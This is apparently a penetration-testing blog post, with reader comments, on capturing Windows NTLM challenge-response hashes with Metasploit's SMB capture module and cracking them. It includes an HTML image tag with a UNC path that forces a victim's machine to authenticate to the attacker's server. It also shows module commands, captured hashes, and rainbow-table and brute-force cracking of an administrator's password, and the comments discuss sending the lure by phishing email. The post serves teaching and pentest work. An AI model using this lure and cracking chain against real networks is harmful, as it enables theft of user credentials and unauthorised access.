The SMB Relay module does just what it says: it relays the SMB session back to another host. It used to be the same host, but now, post MS08-068, you have to pick another system on the network. It doesn't matter which system, just not the same one. (I'll try to cover this in another blog post soon.)
Additionally, the SMB Relay module sends a random challenge for each attempt and doesn't log those challenges anywhere you could go back and retrieve them. That pretty much rules out using the hashes you see in its output for password cracking.
For background, its output looks like this, which looks just like the output of the module that will work :-(
[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1
So what are we to do? Use the SMB sniffer module, of course!
The SMB sniffer module allows you to capture LM/NTLM challenge-response hashes that can be cracked later. It always sends the same known challenge, which is what makes offline cracking of the responses possible.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info
Name: Authentication Capture: SMB
Version: 5966
Provided by: hdm
Description:
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
We need to force the victim to authenticate to Metasploit. The easiest way is to embed a UNC link in a web page or email.
Example: <img src="\\networkIP\share\1.gif">
Once the victim's browser tries to authenticate, the sniffer module captures the hashes, which can be cracked later using rainbow tables. Note the difference from the SMB Relay module, which issues a random challenge, making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module; if you want to try to get a shell, use the smb_relay exploit module.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
We can now use HALFLM rainbow tables generated for the 1122334455667788 challenge to crack the first half of the password.
** We only take the first 16 hex characters (the first 8 bytes) of the LM hash output:
LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d
We can then use rainbow tables to crack the first half:
$ ./rcracki *.rti -h 76365e2d142b5612
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
reading...
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52
You will have to guess or brute-force the rest :-( but thankfully there is a tool in your Metasploit tools directory to help you do just that!
$ ruby halflm_second.rb
Usage: halflm_second.rb
OPTIONS:
-h Display this help information
-n
-p
$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD
Great Work. Very Interesting.
Cheers on the top 5 ranking. You deserve it. Lots of work goes into these articles.
Looking forward to the article about SMB relaying. Does the 3rd party in the attack have to be a DC or will any domain member work?
Very interesting article.
Btw, did you leave a number in the challenge out on purpose, or is it a type mismatch?
I didn't leave anything out on purpose. Can you give me a bit more detail on what you are asking?
Nice work, but I have one question: I saw you didn't use the 112233455667788 challenge.
Is it necessary for the rainbow attack?
The SMB sniffer handles the challenge
Great stuff...
Quick question though: when I attempt to connect to the share from an XPSP3 VM (not in a domain), the responses it automatically sends first are not the right hashes. The LM hash is always cd72dfc6e6d040a4cd72dfc6e6d040a4cd72dfc6e6d040a4 (tried it from a number of systems). However, if I type the username and password in the popup auth box, then the right hashes are sent.
What could be the reason that the system is not trying to automatically authenticate with the right creds?
Appreciate the help and congrats on the top 5, you deserve it.
As far as I know the static challenge is:
1122334455667788
so there is a missing 4 in yours.
Regards.
@Cl@rity_533k4
Yeah, I see now, there was a typo in the post. I added the other 4.
@john I have no idea. Sorry.
Can you advise where to get the rcracki Linux source code that works? The freerainbowtables forum and bulletin board just seem to think the source code is corrupted and offer very little advice on the multitude of compilation errors. Or perhaps you could advise how to compile it in Linux. Thanks
Hmm
If the attacker was sitting out on the Internet and sent a phishing email to users behind a corporate firewall, this should still work, yes? The clients would open the email with the URL you mention and then attempt to authenticate, true?
Authentication only works if the site is in the internal zone. Otherwise Internet Explorer won't do NTLM auth with logged-on credentials.
Instead of halflm_second.rb, you could use John the Ripper with the jumbo patch applied, which contains:
host!user:~/john/john-1.7.6-jumbo-4$ ls doc/NETNTLM_README src/*NET*LM*
doc/NETNTLM_README src/NETLM_fmt.c src/NETNTLM_fmt.c
src/NETHALFLM_fmt.c src/NETLMv2_fmt.c src/NETNTLMv2_fmt.c
This stuff was contributed by JoMo-Kun. You can also find some info on it (and an older revision of it) on his website:
http://www.foofus.net/~jmk/smbchallenge.html
Just thought I'd mention this option as well.
@solardiz
Cool, thanks!
Hey man, great post. My problem now is getting rcracki to compile/install on BT 4. Any suggestions/pointers on how you got yours up and running?
@aerokid240
Without any errors I or anyone else probably can't help you.
@John:
Windows tries anonymous logons first.
Great article Chris.
Problem I'm having is that rcracki can't find the hash you mentioned in your article.
1. I copied the four tables and four index files to /tables on a BT5RC2 box.
2. I did rcracki *.rti -h 76365e2d142b5612 and rcracki told me it couldn't find the hash.
Not sure what I did wrong.
Compilation of rcracki went with some warnings but no errors. The binary seemed to work OK, it just can't find the PASSWOR hash in the downloaded tables. Have you had trouble with corrupted tables maybe?
Chris, your article is 3 years old and still providing value! It just helped me in a pentest to crack the password for an LM challenge/response I gathered from an ettercap SMB MITM and gain that first foothold. One thing that should be noted for everyone, which Chris did use but I missed the first time around, is that you *must* use msf's "auxiliary/server/capture/smb". Some ettercap MITM SMB videos use the smbrelay exploit instead. Do *not* use smbrelay if your goal is to crack LM challenge/response passwords using rainbow tables, because it will not set the server challenge to 1122334455667788 (capture/smb does), and the stock lhhalfchall rainbow tables out on the net (GARR) appear to have been generated using that default challenge. Of course you could generate your own rainbow tables using your server challenge, or rely on John or Cain brute force with a supplied challenge, but good luck with that finishing within your engagement timeframe if it's a decent password.
This does not work if the user is using Chrome or Firefox.